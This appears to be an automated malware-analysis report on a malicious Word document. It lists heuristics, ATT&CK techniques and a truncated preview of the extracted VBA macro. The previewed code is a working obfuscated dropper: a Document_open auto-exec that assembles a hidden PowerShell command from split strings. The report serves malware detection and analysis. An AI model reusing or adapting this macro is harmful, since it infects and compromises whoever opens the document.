MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The critical heuristic firing for Shell() call in VBA, along with the Document_Open macro, indicates that the macro is designed to execute arbitrary commands upon opening. The script attempts to construct and run a command string, likely for downloading and executing a second-stage payload.
Heuristics 5
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 37165 bytes |
SHA-256: 1028d0fc6ec1eaff3cdf8535caf929db5bb1c37517a84eb1bba95b9fb74feae6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "khWRjAEBKLN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
qwPwRD = 98352 - TCFClJ * 84547 + wwboFA + (KFuKl + OdQbwG - owQIc / sViXq) * (75259 + zXtAHW + 80071 * ErXsN)
qaKQD = 83748 - EJPzY * 44697 + XsjhmG + (UfJAKI + RHWsL - KKJdo / fIJMJw) * (78242 + kHALN + 38617 * WuBQs)
mCsFM = 40991 - MjDsJ * 52705 + KSzDVw + (KGLirf + QHNwui - HTEjT / XYzTDs) * (66567 + bBMXj + 49615 * whaVqc)
UaRzj = 9739 - QPonwp * 93676 + kUMUN + (vWhUYJ + VRoOp - GOlVD / mDwLUG) * (83194 + DmbSWV + 65988 * DjfLv)
wAYHQq = 73172 - wIXaiw * 22289 + NjYQi + (VsTqiL + qsBNH - KwzauR / cJwuDZ) * (84982 + RiXIM + 16149 * jnZIbw)
qfHGDcijYSw = Application.Run("qnAMCuQr", "" + oapCVnCfTM + DjhDXwir + RJOQNhaiW + rqjnRvAAHz + obmHtkTiu + adjBIiOHlj + QtrzwJ + qnlhNqV + oEunnOqdoC + BzOIaRrBu + TNTcSNZXj + MhskklqA + vmRui + NWAAQNFdzv + uYmISiYO)
vqjPL = 2636 - qoTubh * 63949 + rGEYt + (RuSmP + zITjAs - bJTBB / qJGtR) * (34769 + FibYUq + 69859 * dvOdwO)
VktjZF = 30168 - FCTDz * 21166 + AUYhR + (vPKHLz + FYFpD - lJYiQz / DTRWj) * (95247 + tOIXh + 41615 * ZUicO)
End Sub
Attribute VB_Name = "SjzdzXZ"
Function RJOQNhaiW()
On Error Resume Next
kpFAX = (HuczW + lOHhEZ / 80921 - HffIn - (mkvcLY + lPXzt * mcoUQQ / CkwZi + zutEKz * sRXwA - wOzwkk - jDwTK))
woHUk = "" + cClWzlacs + zhAUFpUf + "pOwe" + DlNoTttz + wFvQPlbDAXmHoY + "rsH" + jiriqjZIZQY + rjiSQQumjFT + "eLL" + iuWwzpDpN + vDMfmrw + " " + Chr(34) + ZIqHoXHqrwdXQ + fmdSifn + " . " + YWMDPzsGGU + DOHahMwQhi + "( $s" + HAAOfiNliVj + EbsEWQwj + "He" + XVsBTpNnprh + zibcHGrii + "Llid" + dlGMLRiwZ + smduwRhuadI + "[1]" + avopartshdXhj + YIjWqWmowMK + Chr(43) + "$S"
kOlUY = (24957 + QdtXhi + 68830 - IFMMR * 10798 * RtlWW) - 76934 / pcQSt * 16083 + sDJWO
hVzVNjTivc = "" + LpLmbftAz + OwriCqwJnQHOlb + "heL" + CDqDtbCiw + MbwcTKwtWAUH + "li" + CHwEaZLiP + GEBnuJmrGliqon + "D[1" + hVPhvKnrTDdWl + MFfMFzGcriQ + "3]" + Chr(43) + URJQWldNzJB + JTqfQFjHV + "'x"
suXCW = iDTQV / 62489 - jFijW + NMiiYM / (14597 * HkanvN + 6349 / lSoAW + 67600 / 77525 / 90530 - sukmSj)
piLJD = GNiUql / 46354 - sXbEs + lnIDfz / (40363 * sBEHjp + 81661 / iOrON + 26376 / 52078 / 1683 - XPuDw)
bwqat = zfkIW / 4504 - MzzvQM + iQonmm / (21840 * KtXwf + 2064 / YvCUaJ + 41948 / 23827 / 17615 - RwTQFl)
KvuwzEQD = "" + aoOLwpO + StdZTMUTQr + "')" + iYjlfRWvoE + smOAaTw + " ( \" + LVBTTbXSzQWKhw + aTYrdjOhWjh + Chr(34) + "$("
Vrzztv = qEqwN / 41326 - waiiT + VBMkY / (84817 * rCUifb + 41640 / CZBNY + 19010 / 69208 / 9641 - RkmilS)
twtkY = ChSMq / 98802 - onovKp + VAAZuU / (54490 * UwntZ + 98035 / UdaJd + 25776 / 95177 / 15229 - isAub)
URzDDkz = "" + hFTiPZAC + kIQmzHtAdVvBl + "Set" + ToFLFjwWYt + XKcMVivUiBzmas + " 'O" + qMjTXFvlvrWEl + sjKWqAIZTpbvS + "FS" + kNSGjMMza + rRiLrjsJE + "' " + VarhmMdvJ + cGIlfFffmjDbJr + " ''" + wsDJlPTr + wZATfJlwo + ") \" + GDmdYRj + ipqFfCFTJMnQtQ + Chr(34) + " " + fSEupND + rpRfMwm + Chr(43) + "[s" + jIjuocDRnckmM + XswcYJVmSBn + "tRI"
RJOQNhaiW = "" + owNArAkwWldcq + aoRfClITAK + woHUk + LWQtBPOdqOju + hAHVAhl + hVzVNjTivc + djILCjcN + RYbFrcNbuiLEX + KvuwzEQD + EHLfKTz + nKtDLzOB + URzDDkz
udFuQ = nFrMAZ / 23060 - KwYQif + TIRSj / (67735 * PwUKK + 37261 / WzMvm + 44825 / 25610 / 12092 - JOwDt)
End Function
Function rqjnRvAAHz()
On Error Resume Next
iATSZ = TDsiLU / 85404 - YlCzM + cjokzI / (30279 * UjDOFQ + 51930 / ZsOaaS + 89349 / 65422 / 44469 - nunMc)
NMcWH = OPfXA / 57951 - nXVzU + TmocI / (37094 * nCunF + 55079 / LoKuVn + 32709 / 67400 / 75020 - MLwfjn)
SPjbUn = jJdqvs / 80065 - sQozM + wHKNF / (14974 * ifQCX + 43559 / unzCLk + 23736 / 55610 / 87144 - LKUwF)
YltMV = "" + uzLiTRUWi + zObrvMKkmBJ + "ng](" + NjVVJHGT + WdQqYzFDjkCZD + "'36" + rASzoLk + UnvzNbD + "z11" + WFNfVlmj + BDncKSSHoT + "5h89" + lSLWlCGqIhqQ + pMijMHM + "M11" + BjKljuUP + oTvUzzka + "6{"
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.